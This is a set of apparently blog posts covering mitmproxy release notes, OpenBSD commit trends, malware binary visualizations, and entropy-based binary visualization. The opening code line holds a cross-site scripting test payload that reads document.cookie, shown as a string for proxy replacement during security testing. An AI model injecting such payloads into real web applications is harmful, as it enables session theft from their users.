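# Swap a short, likely-unique marker for a long exploit string:
exploit = "<script>alert(document.cookie)</script>"
```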
<h2 id="improved-pretty-printing-of-request-and-response-contents">Improved pretty-printing of request and response contents</h2>
<p>This release of mitmproxy has a completely redesigned subsystem for
pretty-printing request and response bodies. For instance, we now extract EXIF
tags and other basic information to give you something better than a hex dump
when looking at an image:</p>
<div class="media">
<a href="mitmproxy0_8-pretty.png">
<img src="mitmproxy0_8-pretty.png" />
</a>
</div>
<p>We also have much improved HTML indenting (using <a href="http://lxml.de/">lxml</a>), and
a built-in JavaScript beautifier (thanks to
<a href="http://jsbeautifier.org">JSBeautifier</a>) that teases out compressed and
obfuscated scripts into something readable.</p>
<h2 id="changelog">Changelog</h2>
<ul>
<li>Detailed tutorial for Android interception. Some features that landed in
this release have finally made reliable Android interception possible.</li>
<li>Upstream-cert mode, which uses information from the upstream server to
generate interception certificates.</li>
<li>Replacement patterns that let you easily do global replacements in flows
matching filter patterns. Can be specified on the command-line, or edited
interactively.</li>
<li>Much more sophisticated and usable pretty printing of request bodies.
Support for auto-indentation of JavaScript, inspection of image EXIF
data, and more.</li>
<li>Details view for flows, showing connection and SSL cert information (X
keyboard shortcut).</li>
<li>Server certificates are now stored and serialized in saved traffic for
later analysis. This means that the 0.8 serialization format is NOT
compatible with 0.7.</li>
<li>Add a shortcut key ("f") to load the remainder of a request or response body,
if it is abbreviated.</li>
<li>Many other improvements, including bugfixes, an expanded scripting API,
and more sophisticated certificate handling.</li>
</ul>
mitmproxy 0.7
2012-02-27T00:00:00+00:00
2012-02-27T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce0_7/
<div class="media">
<a href="mitmproxy_0_7.png">
<img src="mitmproxy_0_7.png" />
</a>
</div>
<p>I'm happy to announce the release of <a href="http://mitmproxy.org">mitmproxy 0.7</a>. The
biggest visible change is a new structured editor for headers, query strings
and form fields. Other new features include a reverse proxy mode, an extended
script API that makes many common tasks much easier, and a myriad of
improvements to the interface (including a massive increase in speed).
Everybody still on 0.6 should upgrade - get it here:</p>
<h2 id="mitmproxy-0-7-tar-gz-docs"><a href="http://mitmproxy.org">mitmproxy-0.7.tar.gz</a> <a href="http://mitmproxy.org/docs">(docs)</a></h2>
<p>You can also now install mitmproxy using <a href="http://pypi.python.org/pypi/pip">pip</a>, like so:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;"> </span><span style="color:#bf616a;">pip</span><span style="color:#c0c5ce;"> install mitmproxy
</span></code></pre>
<p>In other news, the project has had an amazing month, after a rash of
high-profile results obtained using mitmproxy were published. It started with
<a href="http://mclov.in/2012/02/08/path-uploads-your-entire-address-book-to-their-servers.html">Arun Thampi's
discovery</a>
that Path uploads users' address books to their servers. Things snowballed from
there, and for a few days mitmproxy seemed to be everywhere. Similar findings
were made for
<a href="http://markchang.tumblr.com/post/17244167951/hipster-uploads-part-of-your-iphone-address-book-to-its">Hipster</a>,
<a href="http://www.theverge.com/2012/2/14/2798008/ios-apps-and-the-address-book-what-you-need-to-know">The
Verge</a>
did a mitmproxy-driven AddressbookGate exposé (including vaguely threatening
background shots of mitmproxy doing its dastardly work), and lots of people said
nice things on Twitter.</p>
<p>To see the impact of all of this on the mitmproxy project, you need only look at
the <a href="http://github.com/cortesi/mitmproxy">Github page</a> - watchers of the repo
went from about 200 a month ago, to 950 at the time of this post.</p>
<h2 id="changelog">Changelog</h2>
<ul>
<li>New built-in key/value editor. This lets you interactively edit URL query
strings, headers and URL-encoded form data.</li>
<li>Extend script API to allow duplication and replay of flows.</li>
<li>API for easy manipulation of URL-encoded forms and query strings.</li>
<li>Add "D" shortcut in mitmproxy to duplicate a flow.</li>
<li>Reverse proxy mode. In this mode mitmproxy acts as an HTTP server,
forwarding all traffic to a specified upstream server.</li>
<li>UI improvements - use Unicode characters to make GUI more compact,
improve spacing and layout throughout.</li>
<li>Add support for filtering by HTTP method.</li>
<li>Add the ability to specify an HTTP body size limit.</li>
<li>Move to typed netstrings for serialization format - this makes 0.7
backwards-incompatible with serialized data from 0.6!</li>
<li>Significant improvements in speed and responsiveness of UI.</li>
<li>Many minor bugfixes and improvements.</li>
</ul>
OpenBSD in decline?
2012-02-26T00:00:00+00:00
2012-02-26T00:00:00+00:00
https://corte.si/posts/security/openbsd-decline/
<p>My leisurely Sunday activity today is to set up a new
<a href="http://openbsd.org">OpenBSD</a> firewall for my mobile app testing lab. I haven't
done a from-scratch OpenBSD install for years, so I spent some time reading
through the change logs for the last few versions to catch up with what's
changed. Although the project is clearly still making steady, well-engineered
progress, I had the nagging feeling that the rate of change wasn't what it used
to be. So, I pulled some numbers from <a href="http://archives.neohapsis.com/archives/openbsd/cvs/">CVS commit message list
archives</a>, and graphed
them. Here is the number of commits per month from January 2001 to January
2012. The orange line is a simple 12-month moving average:</p>
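<p>For reference, the orange line is nothing fancier than this - a sketch assuming a plain list of monthly commit counts:</p>

```python
def moving_average(counts, window=12):
    # Trailing moving average over monthly commit counts; months
    # without a full window behind them are omitted.
    return [
        sum(counts[i - window + 1 : i + 1]) / window
        for i in range(window - 1, len(counts))
    ]
```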
<div class="media">
<a href="commitspermonth.png">
<img src="commitspermonth.png" />
</a>
</div>
<p>Now, we should be cautious about interpreting this - the number of commits
doesn't tell us anything about the quality, importance or magnitude of code
change. Even if it did capture all of these things, there are other, and perhaps
better, measures of a project's health. Still, the trend is clear, and suggests a
sustained decline in activity.</p>
<p>I just <a href="http://openbsd.org/orders.html">bought some T-shirts</a> to help support
one of my favourite open source projects. You should too.</p>
Malware
2012-01-05T00:00:00+00:00
2012-01-05T00:00:00+00:00
https://corte.si/posts/visualisation/malware/
<p><b>Edit: Since this post, I've created an interactive tool for binary
visualisation - see it at <a href="http://binvis.io">binvis.io</a></b></p>
<p>Hover and click for more.</p>
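<p>The hover overlay shows local byte entropy. A minimal sketch of the underlying measure (my actual tooling may differ in windowing and scaling):</p>

```python
import math
from collections import Counter

def byte_entropy(block):
    # Shannon entropy of a block of bytes, in bits per byte:
    # 0.0 for a constant block, 8.0 for uniformly distributed bytes.
    counts = Counter(block)
    total = len(block)
    return -sum(
        (c / total) * math.log2(c / total) for c in counts.values()
    )
```

<p>Packed or encrypted regions sit near 8 bits per byte, which is what makes them stand out in the entropy view.</p>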
<style>
.malware {
}
.malware tr {
border: 0;
}
.malware td {
border: 0;
position: relative;
margin: 0 auto;
width: 128px;
height: 138px;
}
.malware td img {
position: absolute;
top:0;
left:0;
overflow: hidden;
height: 128px;
width: 128px;
}
.malware td .entropy {
z-index: 9999;
transition: opacity .3s linear;
cursor: pointer;
}
.malware td :hover > .entropy {
opacity: 0;
}
</style>
<table class="malware">
<tr>
<td>
<a href="0cc9e0ba6a0bd8b79aaf2be22c496228.html">
<img class="entropy" src='small_0cc9e0ba6a0bd8b79aaf2be22c496228_entropy.png'/>
<img class="charclass" src='small_0cc9e0ba6a0bd8b79aaf2be22c496228_charclass.png'/>
</a>
</td>
<td>
<a href="0dcfe476fbd68148f007e6c48c226e0f.html">
<img class="entropy" src='small_0dcfe476fbd68148f007e6c48c226e0f_entropy.png'/>
<img class="charclass" src='small_0dcfe476fbd68148f007e6c48c226e0f_charclass.png'/>
</a>
</td>
<td>
<a href="03b3f30aed5b7dc39bd6e356bbde3713.html">
<img class="entropy" src='small_03b3f30aed5b7dc39bd6e356bbde3713_entropy.png'/>
<img class="charclass" src='small_03b3f30aed5b7dc39bd6e356bbde3713_charclass.png'/>
</a>
</td>
<td>
<a href="131f1cb94df6e2969ac874503cbfd934.html">
<img class="entropy" src='small_131f1cb94df6e2969ac874503cbfd934_entropy.png'/>
<img class="charclass" src='small_131f1cb94df6e2969ac874503cbfd934_charclass.png'/>
</a>
</td>
<td>
<a href="038e3a7add116ac69e5f9539ce461386.html">
<img class="entropy" src='small_038e3a7add116ac69e5f9539ce461386_entropy.png'/>
<img class="charclass" src='small_038e3a7add116ac69e5f9539ce461386_charclass.png'/>
</a>
</td>
</tr><tr>
<td>
<a href="094fedd2e4c175cd81dc170fd4d03917.html">
<img class="entropy" src='small_094fedd2e4c175cd81dc170fd4d03917_entropy.png'/>
<img class="charclass" src='small_094fedd2e4c175cd81dc170fd4d03917_charclass.png'/>
</a>
</td>
<td>
<a href="1a30184661ee6585f4a188107e63a4d2.html">
<img class="entropy" src='small_1a30184661ee6585f4a188107e63a4d2_entropy.png'/>
<img class="charclass" src='small_1a30184661ee6585f4a188107e63a4d2_charclass.png'/>
</a>
</td>
<td>
<a href="1b5bad65f8b72a52cfcae67e3e538f34.html">
<img class="entropy" src='small_1b5bad65f8b72a52cfcae67e3e538f34_entropy.png'/>
<img class="charclass" src='small_1b5bad65f8b72a52cfcae67e3e538f34_charclass.png'/>
</a>
</td>
<td>
<a href="163524fb9a41e6ec79178a902797f8f1.html">
<img class="entropy" src='small_163524fb9a41e6ec79178a902797f8f1_entropy.png'/>
<img class="charclass" src='small_163524fb9a41e6ec79178a902797f8f1_charclass.png'/>
</a>
</td>
<td>
<a href="177827ae9615791e067b4a9fb4be1ab9.html">
<img class="entropy" src='small_177827ae9615791e067b4a9fb4be1ab9_entropy.png'/>
<img class="charclass" src='small_177827ae9615791e067b4a9fb4be1ab9_charclass.png'/>
</a>
</td>
</tr><tr>
<td>
<a href="1b0e377994cfdb4eec0d2fb028118844.html">
<img class="entropy" src='small_1b0e377994cfdb4eec0d2fb028118844_entropy.png'/>
<img class="charclass" src='small_1b0e377994cfdb4eec0d2fb028118844_charclass.png'/>
</a>
</td>
<td>
<a href="0b4f82e83741e79310d797d54db5a9be.html">
<img class="entropy" src='small_0b4f82e83741e79310d797d54db5a9be_entropy.png'/>
<img class="charclass" src='small_0b4f82e83741e79310d797d54db5a9be_charclass.png'/>
</a>
</td>
<td>
<a href="14e6950dd4bcffe54bf158a20437e6b4.html">
<img class="entropy" src='small_14e6950dd4bcffe54bf158a20437e6b4_entropy.png'/>
<img class="charclass" src='small_14e6950dd4bcffe54bf158a20437e6b4_charclass.png'/>
</a>
</td>
<td>
<a href="1998bb714c0de980635ee9b8c1951381.html">
<img class="entropy" src='small_1998bb714c0de980635ee9b8c1951381_entropy.png'/>
<img class="charclass" src='small_1998bb714c0de980635ee9b8c1951381_charclass.png'/>
</a>
</td>
<td>
<a href="023293a96c763bbdee3991994cdcdcef.html">
<img class="entropy" src='small_023293a96c763bbdee3991994cdcdcef_entropy.png'/>
<img class="charclass" src='small_023293a96c763bbdee3991994cdcdcef_charclass.png'/>
</a>
</td>
</tr><tr>
<td>
<a href="14064e26cbd3daed7e6eb3b4fb245c8f.html">
<img class="entropy" src='small_14064e26cbd3daed7e6eb3b4fb245c8f_entropy.png'/>
<img class="charclass" src='small_14064e26cbd3daed7e6eb3b4fb245c8f_charclass.png'/>
</a>
</td>
<td>
<a href="1511f2d75e07bb94f5da8cbc031a51dd.html">
<img class="entropy" src='small_1511f2d75e07bb94f5da8cbc031a51dd_entropy.png'/>
<img class="charclass" src='small_1511f2d75e07bb94f5da8cbc031a51dd_charclass.png'/>
</a>
</td>
<td>
<a href="14560f7dc19e6fef87743f83e5234519.html">
<img class="entropy" src='small_14560f7dc19e6fef87743f83e5234519_entropy.png'/>
<img class="charclass" src='small_14560f7dc19e6fef87743f83e5234519_charclass.png'/>
</a>
</td>
<td>
<a href="00f29767bee5f8bd5b2d55d5be734f69.html">
<img class="entropy" src='small_00f29767bee5f8bd5b2d55d5be734f69_entropy.png'/>
<img class="charclass" src='small_00f29767bee5f8bd5b2d55d5be734f69_charclass.png'/>
</a>
</td>
<td>
<a href="05fd535d70dfb5ee4f36e87e39d8c70d.html">
<img class="entropy" src='small_05fd535d70dfb5ee4f36e87e39d8c70d_entropy.png'/>
<img class="charclass" src='small_05fd535d70dfb5ee4f36e87e39d8c70d_charclass.png'/>
</a>
</td>
</tr><tr>
<td>
<a href="109f8c72ff91dee5906aba0e47324526.html">
<img class="entropy" src='small_109f8c72ff91dee5906aba0e47324526_entropy.png'/>
<img class="charclass" src='small_109f8c72ff91dee5906aba0e47324526_charclass.png'/>
</a>
</td>
<td>
<a href="1aa40b6ea4e7be64d4e6a024fcdf76fe.html">
<img class="entropy" src='small_1aa40b6ea4e7be64d4e6a024fcdf76fe_entropy.png'/>
<img class="charclass" src='small_1aa40b6ea4e7be64d4e6a024fcdf76fe_charclass.png'/>
</a>
</td>
<td>
<a href="1a3aa70d060be5e6e778e3519b400bf1.html">
<img class="entropy" src='small_1a3aa70d060be5e6e778e3519b400bf1_entropy.png'/>
<img class="charclass" src='small_1a3aa70d060be5e6e778e3519b400bf1_charclass.png'/>
</a>
</td>
<td>
<a href="08b983ec55bfd50d1d2cb9a90b1ae54e.html">
<img class="entropy" src='small_08b983ec55bfd50d1d2cb9a90b1ae54e_entropy.png'/>
<img class="charclass" src='small_08b983ec55bfd50d1d2cb9a90b1ae54e_charclass.png'/>
</a>
</td>
<td>
<a href="04240e137999dc6b5115de8db3a15f53.html">
<img class="entropy" src='small_04240e137999dc6b5115de8db3a15f53_entropy.png'/>
<img class="charclass" src='small_04240e137999dc6b5115de8db3a15f53_charclass.png'/>
</a>
</td>
</tr><tr>
<td>
<a href="08c926bf7fbb3397236effef1b30b4df.html">
<img class="entropy" src='small_08c926bf7fbb3397236effef1b30b4df_entropy.png'/>
<img class="charclass" src='small_08c926bf7fbb3397236effef1b30b4df_charclass.png'/>
</a>
</td>
<td>
<a href="09dd27fcccb9c000d37c6394364be1b5.html">
<img class="entropy" src='small_09dd27fcccb9c000d37c6394364be1b5_entropy.png'/>
<img class="charclass" src='small_09dd27fcccb9c000d37c6394364be1b5_charclass.png'/>
</a>
</td>
<td>
<a href="0bcee1314e8c61fa8ef55743f3bb7742.html">
<img class="entropy" src='small_0bcee1314e8c61fa8ef55743f3bb7742_entropy.png'/>
<img class="charclass" src='small_0bcee1314e8c61fa8ef55743f3bb7742_charclass.png'/>
</a>
</td>
<td>
<a href="0e2bf707dbc146c9d60c373237d050b7.html">
<img class="entropy" src='small_0e2bf707dbc146c9d60c373237d050b7_entropy.png'/>
<img class="charclass" src='small_0e2bf707dbc146c9d60c373237d050b7_charclass.png'/>
</a>
</td>
<td>
<a href="0309fc0e6dbeb714c5361f82b2ccb037.html">
<img class="entropy" src='small_0309fc0e6dbeb714c5361f82b2ccb037_entropy.png'/>
<img class="charclass" src='small_0309fc0e6dbeb714c5361f82b2ccb037_charclass.png'/>
</a>
</td>
</tr><tr>
<td>
<a href="0ff25e3cefcce4336d0abeb9f02ccb02.html">
<img class="entropy" src='small_0ff25e3cefcce4336d0abeb9f02ccb02_entropy.png'/>
<img class="charclass" src='small_0ff25e3cefcce4336d0abeb9f02ccb02_charclass.png'/>
</a>
</td>
<td>
<a href="19bc481e5cb1113c7eff49b67273f892.html">
<img class="entropy" src='small_19bc481e5cb1113c7eff49b67273f892_entropy.png'/>
<img class="charclass" src='small_19bc481e5cb1113c7eff49b67273f892_charclass.png'/>
</a>
</td>
<td>
<a href="1a8700c754f97c115fa91fa161fa05cc.html">
<img class="entropy" src='small_1a8700c754f97c115fa91fa161fa05cc_entropy.png'/>
<img class="charclass" src='small_1a8700c754f97c115fa91fa161fa05cc_charclass.png'/>
</a>
</td>
<td>
<a href="12e9e61357be212f28ea4c81ef75018d.html">
<img class="entropy" src='small_12e9e61357be212f28ea4c81ef75018d_entropy.png'/>
<img class="charclass" src='small_12e9e61357be212f28ea4c81ef75018d_charclass.png'/>
</a>
</td>
<td>
<a href="01310712a180d9f939c126712d24363d.html">
<img class="entropy" src='small_01310712a180d9f939c126712d24363d_entropy.png'/>
<img class="charclass" src='small_01310712a180d9f939c126712d24363d_charclass.png'/>
</a>
</td>
</tr><tr>
<td>
<a href="1542a2f2732bbdad500bf112686503ac.html">
<img class="entropy" src='small_1542a2f2732bbdad500bf112686503ac_entropy.png'/>
<img class="charclass" src='small_1542a2f2732bbdad500bf112686503ac_charclass.png'/>
</a>
</td>
<td>
<a href="096381c0f5ddc29319ba2b2647cea116.html">
<img class="entropy" src='small_096381c0f5ddc29319ba2b2647cea116_entropy.png'/>
<img class="charclass" src='small_096381c0f5ddc29319ba2b2647cea116_charclass.png'/>
</a>
</td>
<td>
<a href="17fd97da6d93430ec0d9aa040b4b2c58.html">
<img class="entropy" src='small_17fd97da6d93430ec0d9aa040b4b2c58_entropy.png'/>
<img class="charclass" src='small_17fd97da6d93430ec0d9aa040b4b2c58_charclass.png'/>
</a>
</td>
<td>
<a href="0d9109ab6b06f38221b713eb6a54c42f.html">
<img class="entropy" src='small_0d9109ab6b06f38221b713eb6a54c42f_entropy.png'/>
<img class="charclass" src='small_0d9109ab6b06f38221b713eb6a54c42f_charclass.png'/>
</a>
</td>
<td>
<a href="18ce863d41622cd7aaa3c7d3d11e2f3e.html">
<img class="entropy" src='small_18ce863d41622cd7aaa3c7d3d11e2f3e_entropy.png'/>
<img class="charclass" src='small_18ce863d41622cd7aaa3c7d3d11e2f3e_charclass.png'/>
</a>
</td>
</tr><tr>
<td>
<a href="0f5c70c82a74c8ff3d05fbf4d90bc5bf.html">
<img class="entropy" src='small_0f5c70c82a74c8ff3d05fbf4d90bc5bf_entropy.png'/>
<img class="charclass" src='small_0f5c70c82a74c8ff3d05fbf4d90bc5bf_charclass.png'/>
</a>
</td>
<td>
<a href="0fc12afe2d283b92184897b6e7bcc2c2.html">
<img class="entropy" src='small_0fc12afe2d283b92184897b6e7bcc2c2_entropy.png'/>
<img class="charclass" src='small_0fc12afe2d283b92184897b6e7bcc2c2_charclass.png'/>
</a>
</td>
<td>
<a href="12eec9b3e0aa2e6683487c13eede2382.html">
<img class="entropy" src='small_12eec9b3e0aa2e6683487c13eede2382_entropy.png'/>
<img class="charclass" src='small_12eec9b3e0aa2e6683487c13eede2382_charclass.png'/>
</a>
</td>
<td>
<a href="0d97f71367f8b6dcb8cbc8ec964ebdbe.html">
<img class="entropy" src='small_0d97f71367f8b6dcb8cbc8ec964ebdbe_entropy.png'/>
<img class="charclass" src='small_0d97f71367f8b6dcb8cbc8ec964ebdbe_charclass.png'/>
</a>
</td>
<td>
<a href="18f9ede7d921742f963a0eb06887fdfa.html">
<img class="entropy" src='small_18f9ede7d921742f963a0eb06887fdfa_entropy.png'/>
<img class="charclass" src='small_18f9ede7d921742f963a0eb06887fdfa_charclass.png'/>
</a>
</td>
</tr><tr>
<td>
<a href="16c533cc9b3dac1bde9885b4bd967bff.html">
<img class="entropy" src='small_16c533cc9b3dac1bde9885b4bd967bff_entropy.png'/>
<img class="charclass" src='small_16c533cc9b3dac1bde9885b4bd967bff_charclass.png'/>
</a>
</td>
<td>
<a href="0eab36fc4307a1fd3ad8d832c526cf40.html">
<img class="entropy" src='small_0eab36fc4307a1fd3ad8d832c526cf40_entropy.png'/>
<img class="charclass" src='small_0eab36fc4307a1fd3ad8d832c526cf40_charclass.png'/>
</a>
</td>
<td>
<a href="17fa099ecef82edd1e4ddc61be575ae4.html">
<img class="entropy" src='small_17fa099ecef82edd1e4ddc61be575ae4_entropy.png'/>
<img class="charclass" src='small_17fa099ecef82edd1e4ddc61be575ae4_charclass.png'/>
</a>
</td>
<td>
<a href="07ddb50c4cc358fc3718847684ca5fae.html">
<img class="entropy" src='small_07ddb50c4cc358fc3718847684ca5fae_entropy.png'/>
<img class="charclass" src='small_07ddb50c4cc358fc3718847684ca5fae_charclass.png'/>
</a>
</td>
<td>
<a href="04fee7e6dedf912b4a72886486627b05.html">
<img class="entropy" src='small_04fee7e6dedf912b4a72886486627b05_entropy.png'/>
<img class="charclass" src='small_04fee7e6dedf912b4a72886486627b05_charclass.png'/>
</a>
</td>
</tr>
</table>
<p>Clicking will show you high-detail versions of both visualizations, and let you
look up the binary hash to see what it is. I've used a square Hilbert curve
layout - the files start in the top-left corner, and pass through the quadrants
clockwise.</p>
<p>I spent hours looking through thousands of these visualizations today. I find them
eerie and rather beautiful - an entirely different perspective from my
day-to-day interactions with malware.</p>
Visualizing entropy in binary files
2012-01-04T00:00:00+00:00
2012-01-04T00:00:00+00:00
https://corte.si/posts/visualisation/entropy/
<p><b>Edit: Since this post, I've created an interactive tool for binary
visualisation - see it at <a href="http://binvis.io">binvis.io</a></b></p>
<p>Last week, I wrote about <a href="https://corte.si/posts/visualisation/binvis/">visualizing binary files using space-filling
curves</a>, a technique I use when I need to
get a quick overview of the broad structure of a file. Today, I'll show you an
elaboration of the same basic idea - still based on space-filling curves, but
this time using a colour function that measures local entropy.</p>
<p>Before I get to the details, let's quickly talk about the motivation for a
visualization like this. We can think of entropy as the degree to which a chunk
of data is disordered. If we have a data set where all the elements have the
same value, the amount of disorder is nil, and the entropy is zero. If the data
set has the maximum amount of heterogeneity (i.e. all possible symbols are
represented equally), then we also have the maximum amount of disorder, and thus
the maximum amount of entropy. There are two common types of high-entropy data
that are of special interest to reverse engineers and penetration testers. The
first is compressed data - finding and extracting compressed sections is a
common task in many security audits. The second is cryptographic material -
which is obviously at the heart of most security work. Here, I'm referring not
only to key material and certificates, but also to hashes and actual encrypted
data. As I show below, a tool like the one I'm describing today can be highly
useful in spotting this type of information.</p>
<p>For this visualization, I use the <a href="http://en.wikipedia.org/wiki/Entropy_(information_theory)">Shannon
entropy</a> measure to
calculate byte entropy over a sliding window. This gives us a "local entropy"
value for each byte, even though the concept doesn't really apply to single
symbols.</p>
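<p>As a rough sketch of that idea, here is local Shannon entropy computed over a
sliding byte window in Python. The window size and the normalisation to the 0-1
range are assumptions of mine, not necessarily what my tool uses:</p>

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string, in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    # max() guards against the -0.0 that falls out of uniform data.
    return max(0.0, -sum((n / total) * math.log2(n / total)
                         for n in Counter(data).values()))

def local_entropy(data: bytes, window: int = 32) -> list[float]:
    """Entropy of a window centred on each byte, scaled to [0, 1]."""
    half = window // 2
    return [shannon_entropy(data[max(0, i - half):i + half]) / 8.0
            for i in range(len(data))]
```

<p>Each per-byte value can then be pushed through a colour ramp to produce
the images below.</p>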
<p>With that out of the way, let's look at some pretty pictures.</p>
<h2 id="visualizing-the-osx-ksh-binary">Visualizing the OSX ksh binary</h2>
<p>In my previous post, I used the <a href="http://en.wikipedia.org/wiki/Korn_shell">ksh</a>
binary as a guinea pig, and I'll do the same here. On the left is the entropy
visualization with colours ranging from black for zero entropy, through shades
of blue as entropy increases, to hot pink for maximum entropy. On the right is
the Hilbert curve visualization from the last post for comparison - see <a href="https://corte.si/posts/visualisation/binvis/">the
post itself</a> for an explanation of the
colour scheme. Click for larger versions with much more detail:</p>
<div class="media">
<a href="hilbert-entropy-large.png">
<img src="hilbert-entropy.png" />
</a>
<div class="subtitle">
entropy
</div>
</div>
<div class="media">
<a href="../binvis/binary-large-hilbert.png">
<img src="../binvis/binary-hilbert.png" />
</a>
<div class="subtitle">
byte class
</div>
</div>
<p>Note that this is a dual-architecture
<a href="http://en.wikipedia.org/wiki/Mach-O">Mach-O</a> file, containing code for both
i386 and x86_64. You can see this if you squint at these images - some
broad structures in the file appear twice. We can see that there are a
number of different sections of the <strong>ksh</strong> binary that have very high entropy.
It's not immediately obvious why a system binary would contain either
compressed sections or cryptographic material. As it happens, the explanation
in this case is quite interesting. Let's have a closer look:</p>
<div class="media">
<a href="entropy-annotated.png">
<img src="entropy-annotated.png" />
</a>
</div>
<p>Sections <strong>1</strong> and <strong>2</strong> are a lovely validation of the central idea of this
post. These two areas do indeed contain cryptographic material - in this case,
<a href="http://developer.apple.com/library/mac/#technotes/tn2206/_index.html">code signing hashes and
certificates</a>.
Rather satisfyingly, they stand out like a sore thumb. It turns out that all of
the official OSX binaries are signed by Apple. This is then used in turn to
apply <a href="http://developer.apple.com/library/mac/#technotes/tn2206/_index.html">a variety of
policies</a>,
depending on who the signatory is, and whether they are trusted.</p>
<p>You can dump some rudimentary data about a binary's signature using the
<strong>codesign</strong> command (which you can also use to sign binaries yourself):</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">> codesign -dvv /bin/ksh
Executable=/bin/ksh
Identifier=com.apple.ksh
Format=Mach-O universal (i386 x86_64)
CodeDirectory v=20100 size=5662 flags=0x0(none) hashes=278+2 location=embedded
Signature size=4064
Authority=Software Signing
Authority=Apple Code Signing Certification Authority
Authority=Apple Root CA
Info.plist=not bound
Sealed Resources=none
Internal requirements count=1 size=92
</span></code></pre>
<p>Section <strong>3</strong> (the two occurrences are the same data repeated for each
architecture) is interesting for a different reason - it's a cautionary example
of how the simple entropy measure we're using sometimes detects high entropy in
highly structured data. A hex dump of the start of the region looks like this:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">000d1f00 00 01 00 00 00 02 00 00 00 06 00 00 00 00 00 00 |................|
000d1f10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000d1f20 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |................|
000d1f30 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f |................|
000d1f40 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f | !"#$%&'()*+,-./|
000d1f50 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f |0123456789:;<=>?|
000d1f60 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f |@ABCDEFGHIJKLMNO|
000d1f70 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f |PQRSTUVWXYZ[\]^_|
000d1f80 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f |`abcdefghijklmno|
000d1f90 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f |pqrstuvwxyz{|}~.|
000d1fa0 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f |................|
000d1fb0 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f |................|
000d1fc0 a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af |................|
000d1fd0 b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf |................|
000d1fe0 c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf |................|
000d1ff0 d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df |................|
000d2000 e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef |................|
000d2010 f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff |................|
</span></code></pre>
<p>We see that this section contains each byte value from 0x00 to 0xff in order -
furthermore, this whole block is repeated with minor variations a number of
times. There are two things to explain here - why is this detected as "high
entropy" data, and what the heck is it doing in the file?</p>
<p>First, we need to understand that the Shannon entropy measure looks only at the
relative occurrence frequencies of individual symbols (in this case, bytes). A
chunk of data like the one above therefore looks like it has high entropy,
because each symbol occurs once and only once, making the data highly
heterogeneous.</p>
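<p>A quick way to convince yourself of this: a block containing each byte value
exactly once scores the theoretical maximum of 8 bits per byte under this
measure, despite being perfectly predictable.</p>

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte."""
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())

# The 0x00..0xff run from the hex dump above: 256 symbols, each
# occurring exactly once, so every probability is exactly 1/256.
block = bytes(range(256))
print(shannon_entropy(block))  # 8.0 - the maximum for byte data
```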
<p>Now, what earthly use would chunks of data like this be? With a bit of digging,
I found the answer in the <strong>ksh</strong> source code. These sections are maps used for
translation between various <a href="http://en.wikipedia.org/wiki/EBCDIC">character</a>
<a href="http://en.wikipedia.org/wiki/ASCII">encodings</a>. If you're interested, here's
the <a href="http://opensource.apple.com/source/ksh/ksh-13/ksh/src/lib/libast/string/ccmap.c">culprit in all its repetitive
glory</a>.</p>
<h2 id="the-code">The code</h2>
<p>As usual, the code for generating all of the images in this post is up on
GitHub. The entropy visualizations were created with
<a href="https://github.com/cortesi/scurve/blob/master/binvis">binvis</a>, a new addition
to <a href="https://github.com/cortesi/scurve">scurve</a>, my compendium of code related
to space-filling curves.</p>
A personal link mill
2011-12-30T00:00:00+00:00
2011-12-30T00:00:00+00:00
https://corte.si/posts/socialmedia/linkmill/
<p>I posted a link to an interesting visualization paper on Twitter today,
<a href="https://twitter.com/#!/__mharrison__/status/152503684822081537">prompting someone to ask me where I had found
it</a>. Sadly, I
had to admit that I had no clue where I first saw it referenced, due to the way
I consume links I find on the net. So, I thought I'd write a quick blog post to
explain myself, and then pitch a product idea that could make my life (and maybe
yours) much easier.</p>
<p>First, the problem statement: my aim is to efficiently discover links to
interesting stuff on the net. Simple as that. A few years ago, my flow of links
came mostly from social news sites (<a href="http://news.ycombinator.com">Hacker News</a>
and <a href="http://reddit.com">Reddit</a>), and items shared by people I follow on social
networks. Over time, I became more and more disenchanted with this way of doing
things. The social news approach is to take a torrent of very low quality links
(user submissions), and then crowd-source the filtration process through voting.
But popularity is not a good measure of information quality, and the result is a
bland, lowest-common-denominator view of the world that has no room for anything
that doesn't make it to the front page. Don't get me wrong - Reddit and HN do a
lot of other things well - but they just don't cut it as primary information
sources. Mining links from social networks is a more promising approach, but
still problematic. None of the social networks provide the tools needed to
extract shared links from the update stream and consume them efficiently. There
is also a structural issue - I don't necessarily want to mix my social ties and
my information sources, and I definitely don't want to be limited to just one
platform. These are separate functions that I feel require separate tools.</p>
<h2 id="my-personal-link-mill">My personal link mill</h2>
<p>Eventually, I took matters into my own hands. First, I hugely broadened the
number of information sources I consumed. The tool I use for this is Google
Reader - I now subscribe to about 800 individual feeds, and this number is
growing daily. The trick here is to find high-quality, low-volume link sources.
The motherlode of good links for me was to be found on social bookmarking sites.
